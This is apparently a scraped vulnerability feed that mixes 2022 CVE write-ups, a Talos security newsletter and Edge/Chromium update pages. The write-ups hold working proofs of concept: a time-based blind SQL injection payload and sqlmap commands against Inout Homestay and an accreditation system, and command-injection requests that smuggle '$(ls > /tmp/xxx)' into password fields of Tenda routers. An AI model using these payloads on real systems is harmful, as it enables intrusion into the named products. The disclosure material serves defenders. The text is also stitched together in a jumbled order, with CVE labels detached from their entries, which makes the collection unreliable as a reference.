Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30192, CVE-2022-33638, CVE-2022-33639.

CVE-2022-33680

Inout Homestay v2.2 was discovered to contain a SQL injection vulnerability via the guests parameter at /index.php?page=search/rentals.

**Information**

    Vulnerability Name  : Remote Blind SQL Injections in Inout Homestay
    Product             : Inout Homestay
    version             : 2.2
    Date                : 2022-05-26
    Vendor Site         : https://www.inoutscripts.com/products/inout-homestay/
    POC                 : https://github.com/bigb0x/CVEs/blob/main/Inout-Homestay-2-2-sqli.md
    CVE-Number          : In Progess
    Exploit Author      : Mohamed N. Ali @MohamedNab1l
    

  
**Description**

Inout Homestay Version 2.2 suffers from time-based blind SQL injection. POST parameters "guests" is vulnerable to SQL imjection attacks.This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  

**Vulnerable Parameter: guests (POST)**

Vulnerability: time-based blind SQL injection in guests (POST) parameter. Vulnerabile file: index.php  

**Payload**

address\=3137 Laguna Street&guests\=1' AND (SELECT 1769 FROM (SELECT(SLEEP(5)))XPZb) AND
'ADfU'\='ADfU&indate\=01/01/1967&lat\=1&location\=1&long\=1&outdate\=01/01/1967&searchcity\=San Francisco&searchstate\=NY

  
**HTTP Post Request**

POST /index.php?page\=search/rentals HTTP/1.1
Content\-Type: application/x\-www\-form\-urlencoded
X\-Requested\-With: XMLHttpRequest
Referer: http://vlun\-host.com/
Cookie: currencyid\=10; currencycode\=BYR; language\=2; io\_lang\_code\=es
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 189
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: vlun-host.com
Connection: Keep-alive
address=3&guests=-1 \[inject\_sql\_here\]&indate=01/01/1967&lat=1&location=1&long=1&outdate=01/01/1967&searchcity=San%20Francisco&searchstate=NY

  
**POC: sqlmap command:**

python sqlmap.py \-r homestay.txt  \-p guests \--dbms=MySQL --banner --random-agent --current-db --dbs --current-user

  
**output:**

  
**Timeline**

    2022-05-03: Discovered the bug
    2022-05-03: Reported to vendor
    2022-05-22: Advisory published
    

  
**Discovered by**

    Mohamed N. Ali
    @MohamedNab1l
    ali.mohamed[at]gmail.com

CVE-2022-32055: CVEs/Inout-Homestay-2-2-sqli.md at main · bigb0x/CVEs

Online Accreditation Management v1.0 was discovered to contain a SQL injection vulnerability via the USERNAME parameter at process.php.

**Online-Accreditation-Management-System-v1.0-SQLi******Online Accreditation Management System v1.0 - SQLi******Vendor**

**Description:**

The vulnerability page is process.php

http://your-ip/AccreditationSystem/

Online Accreditation Management System v1.0

The USERNAME parameter in the process.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

Save the POST request package in 1.txt, and then run the sqlmap

python sqlmap.py -r 1.txt  --dbs

\[+\]POST request package

    POST /AccreditationSystem/process.php?action=loginagency HTTP/1.1
    Host: 10.211.55.3
    Content-Length: 40
    Accept: text/plain, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://10.211.55.3
    Referer: http://10.211.55.3/AccreditationSystem/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=kc1vvdqjtt94b9i5461cf4s5r2
    Connection: close
    
    USERNAME=ff%E9%8E%88%27%22%5C%28&PASS=ff
    

**In action:**

**Proof and Exploit:**

watch the video here

CVE-2022-32056: GitHub - JackyG0/Online-Accreditation-Management-System-v1.0-SQLi

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
I’ve been thinking a lot recently about the pros and cons of the way we publicize our threat research. I had a few conversations at Cisco Live with people — who are more generally IT-focused than...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

I’ve been thinking a lot recently about the pros and cons of the way we publicize our threat research. I had a few conversations at Cisco Live with people — who are more generally IT-focused than hyper-focused on cybersecurity — about the amount of information we share on our blog and social media profiles. Our blog serves as the main mouthpiece for Talos, but I’m also always talking to our audience, directly or indirectly, through social media channels, our podcasts, or out in the world at conferences. But during these conversations, readers may wonder if we’re indirectly “helping” the bad guys by pointing out what they’re doing wrong or what we are doing to track them. 

There will always be pros and cons to any type of disclosure of information at this level of cybersecurity. But it’s important to know that we don’t take this issue lightly. When we publicize a technique — whether it be in a blog post, conference talk or podcast — those attackers are actively using, it forces them to change tactics and take time to make tweaks and changes. Unfortunately, we alone do not have the power to bring an end to cybercrime. However, if we can increase the cost of doing business for a threat actor, it's a win for defenders and potential victims. As defenders, we must keep attackers out of their comfort zone and force them to innovate or perish. Without that information being out there publicly, these bad actors could keep using the same tactics indefinitely to infect other targets. 

This is by no means an easy decision to make, it’s a fine line all cybersecurity defenders must continually walk. But as we’ve pointed out several times, cybersecurity is a team sport. Prior to publishing any blog post, we take several steps to make sure everyone is on the same page, including victim notifications and information sharing with our partners like the Cyber Threat Alliance. I think we should all play on the same team and provide our teammates with as much information as possible so they’re ready for game time. To continue the analogy, information sharing with the public allows under-resourced teams to take action to defend themselves without needing to further strain their budgets and people.  

It does us no good to either keep this information to ourselves and try to go out on our own and single-handedly defeat these threat actors because that’s never going to work. And it also doesn’t make sense to be super competitive. We always seek to protect our customers first and foremost, and that includes responsible disclosure policies from our vulnerability management team to our threat researchers. Our intelligence pushes research and defenders forward, and we will always seek to arm them with as much information as possible.  

**The one big thing **

U.S. federal agencies unveiled a great deal about the MedusaLocker ransomware group last week with a joint advisory on the attackers’ operations. The U.S. Cybersecurity Infrastructure Security Agency, FBI and others shared several IOCs related to the actor, warning that they’ve spotted a recent uptick in MedusaLocker’s operations. MedusaLocker gains access to victim devices through vulnerable Remote Desktop Protocol (RDP) configurations or with malicious phishing and spam emails. Once on the targeted system, the attackers encrypt a victim’s files and await ransom payment while propagating across the network. 

> **Why do I care? **Cisco Talos first observed MedusaLocker operating in 2019. Clearly, the group has only expanded its operations since then and is now part of the massive ransomware-as-a-service industry that features several major threat actors. This group made its name by targeting health care organizations during the COVID-19 pandemic, but CISA’s advisory states any industry could be a target. The advisory includes new information on potential mitigations for this malware family, along with known IOCs to block associated with the group.   
> **So now what? **In addition to implementing the mitigations outlined in the advisory, Cisco Secure also has several options available to defend against this attack. There are multiple Snort rules that detect this ransomware’s activity along with several ClamAV signatures. As with all ransomware activity, it’s important to have physical backups on hand in the event of an attack so you can recover quickly. And you can always be prepared for the worst with a Cisco Talos Incident Response plan and/or playbook. 

**Other news of note**

The North Korean state-sponsored actor Lazarus Group is suspected to be behind a recent $100 million cryptocurrency theft. Members of the group allegedly exploited the Harmony Horizon Bridge software that allows users to trade virtual currency between the Harmony blockchain and other blockchains. Attackers obtained username and passwords of Harmony employees that they then used to break into the bridge and deploy several money laundering techniques to hide their actions. The tactics in this case are similar to another attack in April in which attackers stole $600 million from Ronin Bridge. (Bloomberg, Fortune) 

Bad actors are creating fake job applications and attending virtual interviews with deepfake videos. A new warning from the FBI states the adversaries are trying to obtain contractor-level jobs at technology companies, likely to steal sensitive information or make money illegitimately. These fake applicants use stolen identities, fake videos and doctored voices during the application process, including adding in what seem like normal human coughing, sneezing and blinking. The FBI recommends that recruiters or hiring managers look out for telltale signs of deepfake videos like sounds that do not line up with the video on the screen or unnatural lip movements. (TechCrunch, Gawker) 

Google is warning of a high-severity vulnerability in the Chrome web browser for Android that is actively being exploited in the wild. CVE-2022-2294 is a heap buffer overflow bug that, if exploited, could lead to denial-of-service attacks or arbitrary code execution. The company released a security update to patch the vulnerability this week. This update also includes fixes for another high-severity vulnerability (CVE-2022-2295) and an unspecified internal issue discovered. This is the fourth zero-day vulnerability to pop up in Chrome this year. (Dark Reading, Decipher) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #102: Unmasking ransomware groups on the dark web
*   Researcher Spotlight: Around the security world and back again with Nick Biasini
*   Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web

  

**Upcoming events where you can find Talos **

**A New HOPE** (July 22 - 24, 2022)  
New York City 

**BlackHat** **U.S.** (Aug. 6 - 11, 2022)  
Las Vegas, Nevada 

**DEF CON U.S.** (Aug. 11 - 14, 2022)  
Las Vegas, Nevada 

**Most prevalent malware files from Talos telemetry over the past week  **

**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f   

**Typical Filename:** VID001.exe   

**Claimed Product:** N/A   

**Detection Name:** Win.Worm.Coinminer::1201 

**MD5:** 2c8ea737a232fd03ab80db672d50a17a    

**Typical Filename:** LwssPlayer.scr    

**Claimed Product:** 梦想之巅幻灯播放器    

**Detection Name:** Auto.125E12.241442.in02    

**MD5:** 10f1561457242973e0fed724eec92f8c    

**Typical Filename:** ntuser.vbe    

**Claimed Product:** N/A    

**Detection Name:** Auto.1A234656F8.211848.in07.Talos   

**MD5:** a7742a6d7d8b39f1a8cdf7f0b50f12bb    

**Typical Filename:** wrsanvs.exe  

**Claimed Product:** N/A      

**Detection Name:** W32.Auto:91e994229a.in03.Talos

Threat Source newsletter (July 7, 2022) — Teamwork makes the dream work

The Appfire Jira Misc Custom Fields (JMCF) app 2.4.6 for Atlassian Jira allows XSS via a crafted project name to the Add Auto Indexing Rule function.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-039 Product: Jira Misc Custom Fields (JMCF) Manufacturer: Appfire Affected Version(s): 2.4.6 Tested Version(s): 2.4.6 Vulnerability Type: Stored Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Closed Manufacturer Notification: 2022-05-27 Solution Date: 2022-06-29 Public Disclosure: 2022-07-07 CVE Reference: CVE-2022-32567 Author of Advisory: Lukas Faiß, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Jira Misc Custom Fields (JMCF) is an add-on for Jira to perform custom calculations. The manufacturer describes the product as follows (see \[1\]): "JMCF by Appfire lets you easily expose 'hidden' issue information and create calculations - from simple math operations to sophisticated Groovy scripts." Due to insufficient input validation of user-provided input, JMCF is vulnerable to cross-site scripting (XSS) attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The 'Add Auto Indexing Rule' function is prone to a stored XSS attack. XSS vulnerabilities allow an attacker to embed malicious JavaScript code into server replies which is later executed in the browsers of other users. By executing JavaScript, attackers can, for example, perform actions in the context of other logged-in users. For testing purposes, the add-on of the manufacturer\[1\] was used in a local Jira Server\[4\] installation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The combo box project selection within the 'Add Auto Indexing Rule' function is vulnerable to an XSS attack. If a project with the name "Pent" is created, it will be loaded via the following request when loading the projects: GET /rest/jmcf/1/project/picker?query=&maxResults=1000&showAvatar=true HTTP/2 Host: \[REDACTED\] Cookie: Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101" Accept: application/json, text/javascript, \*/\*; q=0.01 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Sec-Ch-Ua-Platform: "Linux" Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://\[REDACTED\]/secure/JMCFEditIndexingRule!Default.jspa?id= Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 The response contains the project names. Within this page, the malicious code is now being executed. Here is a line of the response that contains the malicious stored project name: ,{ "name":"PentProj (PSOPPPP)", "key":"PSOPPPP", "html":"PentProj (PSOPPPP)" }, ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Context-sensitive HTML encoding of project names. More information: https://cheatsheetseries.owasp.org/cheatsheets/Cross\_Site\_Scripting\_ Prevention\_Cheat\_Sheet.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-12: Vulnerability discovered 2022-05-27: Vulnerability reported to manufacturer 2022-06-29: Patch released by manufacturer 2022-07-07: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Jira Misc Custom Fields (JMCF) https://marketplace.atlassian.com/apps/27136/jira-misc-custom-fields-jmcf?hosting=server&tab=overview \[2\] SySS Security Advisory SYSS-2022-039 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-039.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy \[4\] Jira Core Server https://www.atlassian.com/software/jira/core/download ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Lukas Faiß of SySS GmbH. E-Mail: lukas.faiss@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Lukas\_Fai%C3%9F.asc Key Fingerprint: A145 2068 8E74 5053 A7BE 97C3 D78E AE2E B739 3EEA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEoUUgaI50UFOnvpfD146uLrc5PuoFAmLFP9EACgkQ146uLrc5 Pup4yw//QVBRL7vL1QJBPZKUh3tQDka1+1yjOt/IixC1WoccjwTT6Zv+Pb2C8bEJ vCeoqQfBGQeVbiqVaMEiora9ijbDZLorDhjK8UIa3nUGzXGSqgiGJoxDHSe3q1Vr KKOMDqslQP5Zb5CowVtqcNww/ulWm+brr+w6e+sHkc7ibsTPeZaZdh82vqHFs+rb bxcshi+H5kI+QqzKjyP+d+bKoFRbEiKqYX+SRxgY+dY8nGDN3WPIlHie597Jni/M 8QeEjo6owb4QapF7A9emb0PsxJte3nZNeB0NzeHeW0b990Jczl5a4aRZrqKLUq6b Qrmq8Fe8dxr7Gz9btSBFOlbv8B+hSyQNsjvolcjr+0G5czDp6vPvFfP2csJX8hb7 +68xqA5SqL1WBMIWnlddJMC1vknQHvnDkHzl45DPWIWFPMSrBDodQ+A0VkeYe+rd F6jNw2DVXp7Ln2Z2n/OdbhK6+qsLXRB3s6l6sbCsxAI3pvBnNvvq3MjpzBpCvoP4 KvBgu23nucCGGhk3cVWc2iEEcS2aG6FRljiKoYy0+FveyUrB52sTMlD7JttAvgD1 JLJ1df2gDjQ4UOfwaGSl2rQDKWu7M6pxG5jLNvqU1FnQHzlJ8xMaA4K6t3b/oFi8 IKoE7A1LLmkgNpKtqYwFLgVgF+kBro7JYW0NnqXvn92tAXTvQyI= =ZLwT -----END PGP SIGNATURE-----

CVE-2022-32567

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

**\*\*\* Command Injection Vulnerability in Tenda AX1806 \*\*****_**\*Overview\***_**

*   _**\*Type\***_: Command Injection Vulnerability
    
*   _**\*Supplier\***_: Tenda ( https://tenda.com.cn )
    
*   \*\*\*Product\*\*: WiFi router AX1806
    
*   Firmware download address: \*\*\*\* https://www.tenda.com.cn/download/detail-3306.html
    
*   Firmware download address: \*\*\*\* https://down.tenda.com.cn/uploadfile/AX1806/US\_AX1806V21brv1001cn2988ZGDX01.zip
    

Tenda AX1806 uses a new generation of WIFI6 (802.11ax) technology, and combines higher number of subcarriers and 1024QAM modulation technology. Compared with wifi-5 routers, dual-band wireless internet access rate is greatly improved. WanParameterSetting has a Command Execution Vulnerability

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of Tenda AX1806 router simulation:

\### \*_**2\. Vulnerability Details\***_

Tenda AX1806 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

**_**\*3. Recurring loopholes and POC\***_**

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34597: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tenda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\* firmware download address:\***_ https://www.tenda.com.cn/download/detail-3225.html

• _**\* firmware download address:\***_ https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in wanparametersetting

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of simulation for Tenda AX1803 router:

**\*_**2\. Vulnerability Details\***_**

Tenda AX1803 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

\## _**\*3. Recurring loopholes and POC\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34596: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function setipv6status.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tengda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\*Firmware download address：\***_ https://www.tenda.com.cn/download/detail-3225.html

• \*\*\*\*Firmware download address：\*\*\*\*https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in setipv6status

##\* \* \* \\ \* description\*\*\*\*

###_**\* I. product information:\***_

Overview of the latest version of Tenda ax1803 router simulation:

\### _**\*2. Vulnerability details\***_

Tenda ax1803 is found to have a command injection vulnerability in the setipv6status function

When we set connect type = ' PPPoE ', we will get a command injection vulnerability after logging in.

\## _**\*3. Recurring vulnerabilities and POCS\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware through QEMU system or other methods (real machine)

Attack with the following POC attacks

Note to replace the password field in the cookie

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(ls > /tmp/xxx)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-34595: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

**Why is this Chrome CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see Security Update Guide Supports CVEs Assigned by Industry Partners for more information.

**How can I see the version of the browser?**

1.  In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window
2.  Click on **Help and Feedback**
3.  Click on **About Microsoft Edge**

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20220703**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20220703)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-2295: Chromium: CVE-2022-2295 Heap buffer overflow in WebRTC

**What is the version information for this release?**

Microsoft Edge Version

Date Released

Based on Chromium Version

103.0.1264.49

7/6/2022

103.0.5060.114

Extended Stable: 102.0.1245.56

7/6/2022

102.0.5005.148

Tag

#chrome